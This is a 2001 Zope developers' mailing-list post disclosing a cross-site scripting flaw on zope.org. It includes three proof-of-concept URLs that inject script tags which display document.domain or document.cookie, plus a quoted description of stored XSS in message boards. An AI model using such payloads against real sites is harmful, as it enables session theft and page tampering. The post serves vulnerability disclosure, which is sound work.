[Zope-dev] New: Cross Site Scripting vulnerability

ALife Sun, 23 Sep 2001 10:02:01 -0700


Example:

http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>

For  example, an attacker might post a message like

        Hello message board. This is a message.
               <SCRIPT>malicious code</SCRIPT>
        This is the end of my message.

    When a victim with scripts enabled  in their  browser reads this
message,  the  malicious  code   may  be  executed   unexpectedly.
    Scripting tags that can be embedded in this way include <SCRIPT>,
<OBJECT>, <APPLET>, and <EMBED>.



_______________________________________________
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

[Zope-dev] New: Cross Site Scripting vulnerability

Reply via email to